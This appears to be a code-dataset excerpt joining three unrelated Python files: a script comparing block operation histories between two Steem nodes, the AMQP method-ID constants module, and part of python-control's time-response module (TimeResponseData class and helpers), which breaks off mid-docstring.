from jsonsocket import JSONSocket
from jsonsocket import steemd_call
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
from concurrent.futures import Future
from concurrent.futures import wait
from pathlib import Path
# Module-level state shared by the comparison workers below.
wdir = Path()  # directory where per-range difference logs are written
errors = 0  # count of block ranges found to differ
def main():
    """Parse CLI args and fan block comparison out over worker jobs."""
    # argv: jobs url1 url2 [wdir [last_block [first_block]]]
    if len(sys.argv) < 4 or len(sys.argv) > 7:
        print("Usage: script_name jobs url1 url2 [wdir [last_block [first_block]]]")
        print("  Example: script_name 4 http://127.0.0.1:8090 http://127.0.0.1:8091 ./ 5000000 0")
        print( "  set jobs to 0 if you want use all processors" )
        print("  if last_block == 0, it is read from url1 (as reference)")
        exit()
    global wdir
    global errors
    first_block = 0
    last_block = 0
    jobs = int(sys.argv[1])
    if jobs <= 0:
        # 0 means "use every available core"
        import multiprocessing
        jobs = multiprocessing.cpu_count()
    url1 = sys.argv[2]
    url2 = sys.argv[3]
    if len(sys.argv) > 4:
        wdir = Path(sys.argv[4])
    if len(sys.argv) > 5:
        last_block = int(sys.argv[5])
    else:
        last_block = 0
    if len(sys.argv) == 7:
        first_block = int(sys.argv[6])
    else:
        first_block = 0
    # Both nodes must agree on the head block before comparing history.
    last_block1 = get_last_block(url1)
    last_block2 = get_last_block(url2)
    if last_block1 != last_block2:
        exit("last block of {} ({}) is different then last block of {} ({})".format(url1, last_block1, url2, last_block2))
    if last_block == 0:
        last_block = last_block1
    elif last_block != last_block1:
        print("WARNING: last block from cmdline {} is different then from {} ({})".format(last_block, url1, last_block1))
    if last_block == 0:
        exit("last block cannot be 0!")
    create_wdir()
    blocks = last_block - first_block + 1
    if jobs > blocks:
        jobs = blocks
    print("setup:")
    print("  jobs: {}".format(jobs))
    print("  url1: {}".format(url1))
    print("  url2: {}".format(url2))
    print("  wdir: {}".format(wdir))
    print("  block range: {}:{}".format(first_block, last_block))
    if jobs > 1:
        # Split the range evenly; the final submit covers any remainder.
        blocks_per_job = blocks // jobs
        with ProcessPoolExecutor(max_workers=jobs) as executor:
            for i in range(jobs-1):
                executor.submit(compare_results, first_block, (first_block + blocks_per_job - 1), url1, url2)
                first_block = first_block + blocks_per_job
            executor.submit(compare_results, first_block, last_block, url1, url2)
    else:
        compare_results(first_block, last_block, url1, url2)
    # NOTE(review): with ProcessPoolExecutor the workers run in separate
    # processes, so their increments of the global `errors` do not
    # propagate back here — the exit status may always be 0 in the
    # multi-job path. TODO confirm and aggregate worker results instead.
    exit( errors )
def create_wdir():
    """Create the working directory, replacing a plain file of that name.

    Uses the module-level ``wdir`` Path; a no-op when the directory
    already exists.
    """
    global wdir
    # Path.is_file() is False for missing paths, so the extra
    # exists() guard the old code had was redundant.
    if wdir.is_file():
        os.remove(wdir)
    if not wdir.exists():
        wdir.mkdir(parents=True)
def get_last_block(url, max_tries=10, timeout=0.1):
    """Ask a node for its current head block number; 0 on any failure."""
    payload = {
        "jsonrpc": "2.0",
        "id": 0,
        "method": "database_api.get_dynamic_global_properties",
        "params": {}
    }
    request = bytes(json.dumps(payload), "utf-8") + b"\r\n"
    status, response = steemd_call(url, data=request, max_tries=max_tries, timeout=timeout)
    if status == False:
        return 0
    try:
        return response["result"]["head_block_number"]
    except:
        return 0
def compare_results(f_block, l_block, url1, url2, max_tries=10, timeout=0.1):
    """Compare get_ops_in_block responses from two nodes over a range.

    Queries both nodes for each block in [f_block, l_block]; on the
    first mismatch (or call failure) writes both responses to a log in
    ``wdir`` and returns early.
    """
    global wdir
    global errors
    print( "Compare blocks [{} : {}]".format(f_block, l_block) )
    for i in range(f_block, l_block+1):
        request = bytes( json.dumps( {
            "jsonrpc": "2.0",
            "id": i,
            "method": "account_history_api.get_ops_in_block",
            "params": { "block_num": i, "only_virtual": False }
            } ), "utf-8" ) + b"\r\n"
        # Query both nodes concurrently so one slow node doesn't
        # serialize the comparison.
        with ThreadPoolExecutor(max_workers=2) as executor:
        #with ProcessPoolExecutor(max_workers=2) as executor:
            future1 = executor.submit(steemd_call, url1, data=request, max_tries=max_tries, timeout=timeout)
            future2 = executor.submit(steemd_call, url2, data=request, max_tries=max_tries, timeout=timeout)
            status1, json1 = future1.result()
            status2, json2 = future2.result()
        #status1, json1 = steemd_call(url1, data=request, max_tries=max_tries, timeout=timeout)
        #status2, json2 = steemd_call(url2, data=request, max_tries=max_tries, timeout=timeout)
        if status1 == False or status2 == False or json1 != json2:
            print("Difference @block: {}\n".format(i))
            errors += 1
            # One log file per range, named "<first>_<last>.log".
            filename = wdir / Path(str(f_block) + "_" + str(l_block) + ".log")
            try: file = filename.open( "w" )
            except: print( "Cannot open file:", filename ); return
            file.write("Difference @block: {}\n".format(i))
            file.write("{} response:\n".format(url1))
            json.dump(json1, file, indent=2, sort_keys=True)
            file.write("\n")
            file.write("{} response:\n".format(url2))
            json.dump(json2, file, indent=2, sort_keys=True)
            file.write("\n")
            file.close()
            print( "Compare blocks [{} : {}] break with error".format(f_block, l_block) )
            return
    print( "Compare blocks [{} : {}] finished".format(f_block, l_block) )
if __name__ == "__main__":
    # CLI entry point; see the module docstring for usage.
    main()
| 29.407821 | 118 | 0.647226 |
2518e4d0d7d622ed15ecf5e332e9ea29a799908d | 2,178 | py | Python | desktop/core/ext-py/amqp-2.4.1/amqp/spec.py | maulikjs/hue | 59ac879b55bb6fb26ecb4e85f4c70836fc21173f | [
"Apache-2.0"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | desktop/core/ext-py/amqp-2.4.1/amqp/spec.py | zks888/hue | 93a8c370713e70b216c428caa2f75185ef809deb | [
"Apache-2.0"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | desktop/core/ext-py/amqp-2.4.1/amqp/spec.py | zks888/hue | 93a8c370713e70b216c428caa2f75185ef809deb | [
"Apache-2.0"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | """AMQP Spec."""
from __future__ import absolute_import, unicode_literals
from collections import namedtuple
# (method_sig, args, content) triple describing one AMQP method.
method_t = namedtuple('method_t', ('method_sig', 'args', 'content'))
def method(method_sig, args=None, content=False):
    """Create amqp method specification tuple."""
    return method_t(method_sig, args=args, content=content)
class Connection:
    """AMQ Connection class.

    Constants are (class_id, method_id) pairs from the AMQP 0-9-1
    connection class.
    """
    CLASS_ID = 10
    # Protocol/authentication negotiation handshake
    Start = (10, 10)
    StartOk = (10, 11)
    Secure = (10, 20)
    SecureOk = (10, 21)
    # Tuning of limits (channel-max, frame-max, heartbeat)
    Tune = (10, 30)
    TuneOk = (10, 31)
    # Virtual-host open and orderly shutdown
    Open = (10, 40)
    OpenOk = (10, 41)
    Close = (10, 50)
    CloseOk = (10, 51)
    # Broker flow-control notifications
    Blocked = (10, 60)
    Unblocked = (10, 61)
class Channel:
    """AMQ Channel class.

    Constants are (class_id, method_id) pairs from the AMQP 0-9-1
    channel class.
    """
    CLASS_ID = 20
    Open = (20, 10)
    OpenOk = (20, 11)
    # Per-channel flow control
    Flow = (20, 20)
    FlowOk = (20, 21)
    Close = (20, 40)
    CloseOk = (20, 41)
class Exchange:
    """AMQ Exchange class.

    Constants are (class_id, method_id) pairs from the AMQP 0-9-1
    exchange class.
    """
    CLASS_ID = 40
    Declare = (40, 10)
    DeclareOk = (40, 11)
    Delete = (40, 20)
    DeleteOk = (40, 21)
    # Exchange-to-exchange binding (broker extension)
    Bind = (40, 30)
    BindOk = (40, 31)
    Unbind = (40, 40)
    UnbindOk = (40, 51)
class Queue:
    """AMQ Queue class.

    Constants are (class_id, method_id) pairs from the AMQP 0-9-1
    queue class.
    """
    CLASS_ID = 50
    Declare = (50, 10)
    DeclareOk = (50, 11)
    Bind = (50, 20)
    BindOk = (50, 21)
    Purge = (50, 30)
    PurgeOk = (50, 31)
    Delete = (50, 40)
    DeleteOk = (50, 41)
    Unbind = (50, 50)
    UnbindOk = (50, 51)
class Basic:
    """AMQ Basic class.

    Constants are (class_id, method_id) pairs from the AMQP 0-9-1
    basic (message transfer) class.
    """
    CLASS_ID = 60
    # Prefetch / quality-of-service
    Qos = (60, 10)
    QosOk = (60, 11)
    # Consumer registration
    Consume = (60, 20)
    ConsumeOk = (60, 21)
    Cancel = (60, 30)
    CancelOk = (60, 31)
    # Publishing and message delivery
    Publish = (60, 40)
    Return = (60, 50)
    Deliver = (60, 60)
    # Synchronous message fetch
    Get = (60, 70)
    GetOk = (60, 71)
    GetEmpty = (60, 72)
    # Acknowledgement and rejection
    Ack = (60, 80)
    Nack = (60, 120)
    Reject = (60, 90)
    RecoverAsync = (60, 100)
    Recover = (60, 110)
    RecoverOk = (60, 111)
class Confirm:
    """AMQ Confirm class.

    Constants are (class_id, method_id) pairs for publisher confirms
    (a broker extension to AMQP 0-9-1).
    """
    CLASS_ID = 85
    Select = (85, 10)
    SelectOk = (85, 11)
class Tx:
    """AMQ Tx class.

    Constants are (class_id, method_id) pairs from the AMQP 0-9-1
    transaction class.
    """
    CLASS_ID = 90
    Select = (90, 10)
    SelectOk = (90, 11)
    Commit = (90, 20)
    CommitOk = (90, 21)
    Rollback = (90, 30)
    RollbackOk = (90, 31)
| 17.707317 | 68 | 0.52663 |
3f3eacc271d902d8a908677b96194569fa02bd7b | 80,193 | py | Python | control/timeresp.py | berezhko/python-control | 78ec3eedd5a4a5f3d8409eec7c7f7e787793b357 | [
"BSD-3-Clause"
] | 1,112 | 2015-01-14T08:01:33.000Z | 2022-03-31T11:54:00.000Z | control/timeresp.py | berezhko/python-control | 78ec3eedd5a4a5f3d8409eec7c7f7e787793b357 | [
"BSD-3-Clause"
] | 646 | 2015-02-02T15:35:23.000Z | 2022-03-30T08:19:26.000Z | control/timeresp.py | berezhko/python-control | 78ec3eedd5a4a5f3d8409eec7c7f7e787793b357 | [
"BSD-3-Clause"
] | 366 | 2015-01-28T17:58:06.000Z | 2022-03-29T11:04:10.000Z | """
timeresp.py - time-domain simulation routines.
The :mod:`~control.timeresp` module contains a collection of
functions that are used to compute time-domain simulations of LTI
systems.
Arguments to time-domain simulations include a time vector, an input
vector (when needed), and an initial condition vector. The most
general function for simulating LTI systems the
:func:`forced_response` function, which has the form::
t, y = forced_response(sys, T, U, X0)
where `T` is a vector of times at which the response should be
evaluated, `U` is a vector of inputs (one for each time point) and
`X0` is the initial condition for the system.
See :ref:`time-series-convention` for more information on how time
series data are represented.
Copyright (c) 2011 by California Institute of Technology
All rights reserved.
Copyright (c) 2011 by Eike Welk
Copyright (c) 2010 by SciPy Developers
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of the California Institute of Technology nor
the names of its contributors may be used to endorse or promote
products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH
OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
Initial Author: Eike Welk
Date: 12 May 2011
Modified: Sawyer B. Fuller (minster@uw.edu) to add discrete-time
capability and better automatic time vector creation
Date: June 2020
Modified by Ilhan Polat to improve automatic time vector creation
Date: August 17, 2020
Modified by Richard Murray to add TimeResponseData class
Date: August 2021
$Id$
"""
import warnings
import numpy as np
import scipy as sp
from numpy import einsum, maximum, minimum
from scipy.linalg import eig, eigvals, matrix_balance, norm
from copy import copy
from . import config
from .lti import isctime, isdtime
from .statesp import StateSpace, _convert_to_statespace, _mimo2simo, _mimo2siso
from .xferfcn import TransferFunction
__all__ = ['forced_response', 'step_response', 'step_info',
'initial_response', 'impulse_response', 'TimeResponseData']
class TimeResponseData():
"""A class for returning time responses.
This class maintains and manipulates the data corresponding to the
temporal response of an input/output system. It is used as the return
type for time domain simulations (step response, input/output response,
etc).
A time response consists of a time vector, an output vector, and
optionally an input vector and/or state vector. Inputs and outputs can
be 1D (scalar input/output) or 2D (vector input/output).
A time response can be stored for multiple input signals (called traces),
with the output and state indexed by the trace number. This allows for
input/output response matrices, which is mainly useful for impulse and
step responses for linear systems. For multi-trace responses, the same
time vector must be used for all traces.
Time responses are accessed through either the raw data, stored as
:attr:`t`, :attr:`y`, :attr:`x`, :attr:`u`, or using a set of properties
:attr:`time`, :attr:`outputs`, :attr:`states`, :attr:`inputs`. When
accessing time responses via their properties, squeeze processing is
applied so that (by default) single-input, single-output systems will have
the output and input indices supressed. This behavior is set using the
``squeeze`` keyword.
Attributes
----------
t : 1D array
Time values of the input/output response(s). This attribute is
normally accessed via the :attr:`time` property.
y : 2D or 3D array
Output response data, indexed either by output index and time (for
single trace responses) or output, trace, and time (for multi-trace
responses). These data are normally accessed via the :attr:`outputs`
property, which performs squeeze processing.
x : 2D or 3D array, or None
State space data, indexed either by output number and time (for single
trace responses) or output, trace, and time (for multi-trace
responses). If no state data are present, value is ``None``. These
data are normally accessed via the :attr:`states` property, which
performs squeeze processing.
u : 2D or 3D array, or None
Input signal data, indexed either by input index and time (for single
trace responses) or input, trace, and time (for multi-trace
responses). If no input data are present, value is ``None``. These
data are normally accessed via the :attr:`inputs` property, which
performs squeeze processing.
squeeze : bool, optional
By default, if a system is single-input, single-output (SISO)
then the outputs (and inputs) are returned as a 1D array
(indexed by time) and if a system is multi-input or
multi-output, then the outputs are returned as a 2D array
(indexed by output and time) or a 3D array (indexed by output,
trace, and time). If ``squeeze=True``, access to the output
response will remove single-dimensional entries from the shape
of the inputs and outputs even if the system is not SISO. If
``squeeze=False``, the output is returned as a 2D or 3D array
(indexed by the output [if multi-input], trace [if multi-trace]
and time) even if the system is SISO. The default value can be
set using config.defaults['control.squeeze_time_response'].
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`). Default
value is False.
issiso : bool, optional
Set to ``True`` if the system generating the data is single-input,
single-output. If passed as ``None`` (default), the input data
will be used to set the value.
ninputs, noutputs, nstates : int
Number of inputs, outputs, and states of the underlying system.
input_labels, output_labels, state_labels : array of str
Names for the input, output, and state variables.
ntraces : int
Number of independent traces represented in the input/output
response. If ntraces is 0 then the data represents a single trace
with the trace index surpressed in the data.
Notes
-----
1. For backward compatibility with earlier versions of python-control,
this class has an ``__iter__`` method that allows it to be assigned
to a tuple with a variable number of elements. This allows the
following patterns to work:
t, y = step_response(sys)
t, y, x = step_response(sys, return_x=True)
When using this (legacy) interface, the state vector is not affected by
the `squeeze` parameter.
2. For backward compatibility with earlier version of python-control,
this class has ``__getitem__`` and ``__len__`` methods that allow the
return value to be indexed:
response[0]: returns the time vector
response[1]: returns the output vector
response[2]: returns the state vector
When using this (legacy) interface, the state vector is not affected by
the `squeeze` parameter.
3. The default settings for ``return_x``, ``squeeze`` and ``transpose``
can be changed by calling the class instance and passing new values:
response(tranpose=True).input
See :meth:`TimeResponseData.__call__` for more information.
"""
    def __init__(
            self, time, outputs, states=None, inputs=None, issiso=None,
            output_labels=None, state_labels=None, input_labels=None,
            transpose=False, return_x=False, squeeze=None, multi_trace=False
    ):
        """Create an input/output time response object.

        Parameters
        ----------
        time : 1D array
            Time values of the output. Ignored if None.
        outputs : ndarray
            Output response of the system. This can either be a 1D array
            indexed by time (for SISO systems or MISO systems with a specified
            input), a 2D array indexed by output and time (for MIMO systems
            with no input indexing, such as initial_response or forced
            response) or trace and time (for SISO systems with multiple
            traces), or a 3D array indexed by output, trace, and time (for
            multi-trace input/output responses).
        states : array, optional
            Individual response of each state variable. This should be a 2D
            array indexed by the state index and time (for single trace
            systems) or a 3D array indexed by state, trace, and time.
        inputs : array, optional
            Inputs used to generate the output. This can either be a 1D
            array indexed by time (for SISO systems or MISO/MIMO systems
            with a specified input), a 2D array indexed either by input and
            time (for a multi-input system) or trace and time (for a
            single-input, multi-trace response), or a 3D array indexed by
            input, trace, and time.
        sys : LTI or InputOutputSystem, optional
            System that generated the data. If desired, the system used to
            generate the data can be stored along with the data.
        squeeze : bool, optional
            By default, if a system is single-input, single-output (SISO)
            then the inputs and outputs are returned as a 1D array (indexed
            by time) and if a system is multi-input or multi-output, then
            the inputs are returned as a 2D array (indexed by input and
            time) and the outputs are returned as either a 2D array (indexed
            by output and time) or a 3D array (indexed by output, trace, and
            time). If squeeze=True, access to the output response will
            remove single-dimensional entries from the shape of the inputs
            and outputs even if the system is not SISO. If squeeze=False,
            keep the input as a 2D or 3D array (indexed by the input (if
            multi-input), trace (if single input) and time) and the output
            as a 3D array (indexed by the output, trace, and time) even if
            the system is SISO. The default value can be set using
            config.defaults['control.squeeze_time_response'].

        Other parameters
        ----------------
        input_labels, output_labels, state_labels: array of str, optional
            Optional labels for the inputs, outputs, and states, given as a
            list of strings matching the appropriate signal dimension.
        transpose : bool, optional
            If True, transpose all input and output arrays (for backward
            compatibility with MATLAB and :func:`scipy.signal.lsim`).
            Default value is False.
        return_x : bool, optional
            If True, return the state vector when enumerating result by
            assigning to a tuple (default = False).
        multi_trace : bool, optional
            If ``True``, then 2D input array represents multiple traces. For
            a MIMO system, the ``input`` attribute should then be set to
            indicate which trace is being specified. Default is ``False``.
        """
        #
        # Process and store the basic input/output elements
        #

        # Time vector (stored as-is; shape is validated against signals below)
        self.t = np.atleast_1d(time)
        if self.t.ndim != 1:
            raise ValueError("Time vector must be 1D array")

        #
        # Output vector (and number of traces)
        #
        # The number of output dimensions determines whether the data is
        # multi-trace; a 3D array forces multi_trace regardless of keyword.
        #
        self.y = np.array(outputs)

        if self.y.ndim == 3:
            multi_trace = True
            self.noutputs = self.y.shape[0]
            self.ntraces = self.y.shape[1]

        elif multi_trace and self.y.ndim == 2:
            self.noutputs = 1
            self.ntraces = self.y.shape[0]

        elif not multi_trace and self.y.ndim == 2:
            self.noutputs = self.y.shape[0]
            self.ntraces = 0

        elif not multi_trace and self.y.ndim == 1:
            self.noutputs = 1
            self.ntraces = 0

            # Reshape the data to be 2D for consistency
            self.y = self.y.reshape(self.noutputs, -1)

        else:
            raise ValueError("Output vector is the wrong shape")

        # Check and store labels, if present
        self.output_labels = _process_labels(
            output_labels, "output", self.noutputs)

        # Make sure time dimension of output is the right length
        if self.t.shape[-1] != self.y.shape[-1]:
            raise ValueError("Output vector does not match time vector")

        #
        # State vector (optional)
        #
        # If present, the shape of the state vector should be consistent
        # with the multi-trace nature of the data.
        #
        if states is None:
            self.x = None
            self.nstates = 0
        else:
            self.x = np.array(states)
            self.nstates = self.x.shape[0]

            # Make sure the shape is OK: 3D (with matching trace count) for
            # multi-trace data, 2D otherwise
            if multi_trace and \
                 (self.x.ndim != 3 or self.x.shape[1] != self.ntraces) or \
                 not multi_trace and self.x.ndim != 2 :
                raise ValueError("State vector is the wrong shape")

            # Make sure time dimension of state is the right length
            if self.t.shape[-1] != self.x.shape[-1]:
                raise ValueError("State vector does not match time vector")

        # Check and store labels, if present
        self.state_labels = _process_labels(
            state_labels, "state", self.nstates)

        #
        # Input vector (optional)
        #
        # If present, the shape and dimensions of the input vector should be
        # consistent with the trace count computed above.
        #
        if inputs is None:
            self.u = None
            self.ninputs = 0

        else:
            self.u = np.array(inputs)

            # Make sure the shape is OK and figure out the number of inputs
            if multi_trace and self.u.ndim == 3 and \
                 self.u.shape[1] == self.ntraces:
                self.ninputs = self.u.shape[0]

            elif multi_trace and self.u.ndim == 2 and \
                 self.u.shape[0] == self.ntraces:
                self.ninputs = 1

            elif not multi_trace and self.u.ndim == 2 and \
                 self.ntraces == 0:
                self.ninputs = self.u.shape[0]

            elif not multi_trace and self.u.ndim == 1:
                self.ninputs = 1

                # Reshape the data to be 2D for consistency
                self.u = self.u.reshape(self.ninputs, -1)

            else:
                raise ValueError("Input vector is the wrong shape")

            # Make sure time dimension of input is the right length
            if self.t.shape[-1] != self.u.shape[-1]:
                raise ValueError("Input vector does not match time vector")

        # Check and store labels, if present
        self.input_labels = _process_labels(
            input_labels, "input", self.ninputs)

        # Figure out if the system is SISO
        if issiso is None:
            # Figure out based on the data
            if self.ninputs == 1:
                issiso = (self.noutputs == 1)
            elif self.ninputs > 1:
                issiso = False
            else:
                # Missing input data => can't resolve
                raise ValueError("Can't determine if system is SISO")
        elif issiso is True and (self.ninputs > 1 or self.noutputs > 1):
            raise ValueError("Keyword `issiso` does not match data")

        # Set the value to be used for future processing
        self.issiso = issiso

        # Keep track of whether to squeeze inputs, outputs, and states
        if not (squeeze is True or squeeze is None or squeeze is False):
            raise ValueError("Unknown squeeze value")
        self.squeeze = squeeze

        # Keep track of whether to transpose for MATLAB/scipy.signal
        self.transpose = transpose

        # Store legacy keyword values (only needed for legacy interface)
        self.return_x = return_x
def __call__(self, **kwargs):
"""Change value of processing keywords.
Calling the time response object will create a copy of the object and
change the values of the keywords used to control the ``outputs``,
``states``, and ``inputs`` properties.
Parameters
----------
squeeze : bool, optional
If squeeze=True, access to the output response will remove
single-dimensional entries from the shape of the inputs, outputs,
and states even if the system is not SISO. If squeeze=False, keep
the input as a 2D or 3D array (indexed by the input (if
multi-input), trace (if single input) and time) and the output and
states as a 3D array (indexed by the output/state, trace, and
time) even if the system is SISO.
transpose : bool, optional
If True, transpose all input and output arrays (for backward
compatibility with MATLAB and :func:`scipy.signal.lsim`).
Default value is False.
return_x : bool, optional
If True, return the state vector when enumerating result by
assigning to a tuple (default = False).
input_labels, output_labels, state_labels: array of str
Labels for the inputs, outputs, and states, given as a
list of strings matching the appropriate signal dimension.
"""
# Make a copy of the object
response = copy(self)
# Update any keywords that we were passed
response.transpose = kwargs.pop('transpose', self.transpose)
response.squeeze = kwargs.pop('squeeze', self.squeeze)
response.return_x = kwargs.pop('return_x', self.squeeze)
# Check for new labels
input_labels = kwargs.pop('input_labels', None)
if input_labels is not None:
response.input_labels = _process_labels(
input_labels, "input", response.ninputs)
output_labels = kwargs.pop('output_labels', None)
if output_labels is not None:
response.output_labels = _process_labels(
output_labels, "output", response.noutputs)
state_labels = kwargs.pop('state_labels', None)
if state_labels is not None:
response.state_labels = _process_labels(
state_labels, "state", response.nstates)
# Make sure no unknown keywords were passed
if len(kwargs) != 0:
raise ValueError("Unknown parameter(s) %s" % kwargs)
return response
@property
def time(self):
"""Time vector.
Time values of the input/output response(s).
:type: 1D array"""
return self.t
# Getter for output (implements squeeze processing)
@property
def outputs(self):
"""Time response output vector.
Output response of the system, indexed by either the output and time
(if only a single input is given) or the output, trace, and time
(for multiple traces). See :attr:`TimeResponseData.squeeze` for a
description of how this can be modified using the `squeeze` keyword.
:type: 1D, 2D, or 3D array
"""
t, y = _process_time_response(
self.t, self.y, issiso=self.issiso,
transpose=self.transpose, squeeze=self.squeeze)
return y
# Getter for states (implements squeeze processing)
@property
def states(self):
"""Time response state vector.
Time evolution of the state vector, indexed indexed by either the
state and time (if only a single trace is given) or the state, trace,
and time (for multiple traces). See :attr:`TimeResponseData.squeeze`
for a description of how this can be modified using the `squeeze`
keyword.
:type: 2D or 3D array
"""
if self.x is None:
return None
elif self.squeeze is True:
x = self.x.squeeze()
elif self.ninputs == 1 and self.noutputs == 1 and \
self.ntraces == 1 and self.x.ndim == 3 and \
self.squeeze is not False:
# Single-input, single-output system with single trace
x = self.x[:, 0, :]
else:
# Return the full set of data
x = self.x
# Transpose processing
if self.transpose:
x = np.transpose(x, np.roll(range(x.ndim), 1))
return x
# Getter for inputs (implements squeeze processing)
@property
def inputs(self):
"""Time response input vector.
Input(s) to the system, indexed by input (optiona), trace (optional),
and time. If a 1D vector is passed, the input corresponds to a
scalar-valued input. If a 2D vector is passed, then it can either
represent multiple single-input traces or a single multi-input trace.
The optional ``multi_trace`` keyword should be used to disambiguate
the two. If a 3D vector is passed, then it represents a multi-trace,
multi-input signal, indexed by input, trace, and time.
See :attr:`TimeResponseData.squeeze` for a description of how the
dimensions of the input vector can be modified using the `squeeze`
keyword.
:type: 1D or 2D array
"""
if self.u is None:
return None
t, u = _process_time_response(
self.t, self.u, issiso=self.issiso,
transpose=self.transpose, squeeze=self.squeeze)
return u
# Getter for legacy state (implements non-standard squeeze processing)
@property
def _legacy_states(self):
"""Time response state vector (legacy version).
Time evolution of the state vector, indexed indexed by either the
state and time (if only a single trace is given) or the state,
trace, and time (for multiple traces).
The `legacy_states` property is not affected by the `squeeze` keyword
and hence it will always have these dimensions.
:type: 2D or 3D array
"""
if self.x is None:
return None
elif self.ninputs == 1 and self.noutputs == 1 and \
self.ntraces == 1 and self.x.ndim == 3:
# Single-input, single-output system with single trace
x = self.x[:, 0, :]
else:
# Return the full set of data
x = self.x
# Transpose processing
if self.transpose:
x = np.transpose(x, np.roll(range(x.ndim), 1))
return x
# Implement iter to allow assigning to a tuple
def __iter__(self):
if not self.return_x:
return iter((self.time, self.outputs))
return iter((self.time, self.outputs, self._legacy_states))
# Implement (thin) getitem to allow access via legacy indexing
def __getitem__(self, index):
# See if we were passed a slice
if isinstance(index, slice):
if (index.start is None or index.start == 0) and index.stop == 2:
return (self.time, self.outputs)
# Otherwise assume we were passed a single index
if index == 0:
return self.time
if index == 1:
return self.outputs
if index == 2:
return self._legacy_states
raise IndexError
# Implement (thin) len to emulate legacy testing interface
def __len__(self):
return 3 if self.return_x else 2
# Process signal labels
def _process_labels(labels, signal, length):
"""Process time response signal labels.
Parameters
----------
labels : list of str or dict
Description of the labels for the signal. This can be a list of
strings or a dict giving the index of each signal (used in iosys).
signal : str
Name of the signal being processed (for error messages).
length : int
Number of labels required.
Returns
-------
labels : list of str
List of labels.
"""
if labels is None or len(labels) == 0:
return None
# See if we got passed a dictionary (from iosys)
if isinstance(labels, dict):
# Form inverse dictionary
ivd = {v: k for k, v in labels.items()}
try:
# Turn into a list
labels = [ivd[n] for n in range(len(labels))]
except KeyError:
raise ValueError("Name dictionary for %s is incomplete" % signal)
# Convert labels to a list
labels = list(labels)
# Make sure the signal list is the right length and type
if len(labels) != length:
raise ValueError("List of %s labels is the wrong length" % signal)
elif not all([isinstance(label, str) for label in labels]):
raise ValueError("List of %s labels must all be strings" % signal)
return labels
# Helper function for checking array-like parameters
def _check_convert_array(in_obj, legal_shapes, err_msg_start, squeeze=False,
transpose=False):
"""Helper function for checking array_like parameters.
* Check type and shape of ``in_obj``.
* Convert ``in_obj`` to an array if necessary.
* Change shape of ``in_obj`` according to parameter ``squeeze``.
* If ``in_obj`` is a scalar (number) it is converted to an array with
a legal shape, that is filled with the scalar value.
The function raises an exception when it detects an error.
Parameters
----------
in_obj : array like object
The array or matrix which is checked.
legal_shapes : list of tuple
A list of shapes that in_obj can legally have.
The special value "any" means that there can be any
number of elements in a certain dimension.
* ``(2, 3)`` describes an array with 2 rows and 3 columns
* ``(2, "any")`` describes an array with 2 rows and any number of
columns
err_msg_start : str
String that is prepended to the error messages, when this function
raises an exception. It should be used to identify the argument which
is currently checked.
squeeze : bool
If True, all dimensions with only one element are removed from the
array. If False the array's shape is unmodified.
For example:
``array([[1,2,3]])`` is converted to ``array([1, 2, 3])``
transpose : bool, optional
If True, assume that 2D input arrays are transposed from the standard
format. Used to convert MATLAB-style inputs to our format.
Returns
-------
out_array : array
The checked and converted contents of ``in_obj``.
"""
# convert nearly everything to an array.
out_array = np.asarray(in_obj)
if (transpose):
out_array = np.transpose(out_array)
# Test element data type, elements must be numbers
legal_kinds = set(("i", "f", "c")) # integer, float, complex
if out_array.dtype.kind not in legal_kinds:
err_msg = "Wrong element data type: '{d}'. Array elements " \
"must be numbers.".format(d=str(out_array.dtype))
raise TypeError(err_msg_start + err_msg)
# If array is zero dimensional (in_obj is scalar):
# create array with legal shape filled with the original value.
if out_array.ndim == 0:
for s_legal in legal_shapes:
# search for shape that does not contain the special symbol any.
if "any" in s_legal:
continue
the_val = out_array[()]
out_array = np.empty(s_legal, 'd')
out_array.fill(the_val)
break
# Test shape
def shape_matches(s_legal, s_actual):
"""Test if two shape tuples match"""
# Array must have required number of dimensions
if len(s_legal) != len(s_actual):
return False
# All dimensions must contain required number of elements. Joker: "all"
for n_legal, n_actual in zip(s_legal, s_actual):
if n_legal == "any":
continue
if n_legal != n_actual:
return False
return True
# Iterate over legal shapes, and see if any matches out_array's shape.
for s_legal in legal_shapes:
if shape_matches(s_legal, out_array.shape):
break
else:
legal_shape_str = " or ".join([str(s) for s in legal_shapes])
err_msg = "Wrong shape (rows, columns): {a}. Expected: {e}." \
.format(e=legal_shape_str, a=str(out_array.shape))
raise ValueError(err_msg_start + err_msg)
# Convert shape
if squeeze:
out_array = np.squeeze(out_array)
# We don't want zero dimensional arrays
if out_array.shape == tuple():
out_array = out_array.reshape((1,))
return out_array
# Forced response of a linear system
def forced_response(sys, T=None, U=0., X0=0., transpose=False,
                    interpolate=False, return_x=None, squeeze=None):
    """Simulate the output of a linear system.

    As a convenience for parameters `U`, `X0`:
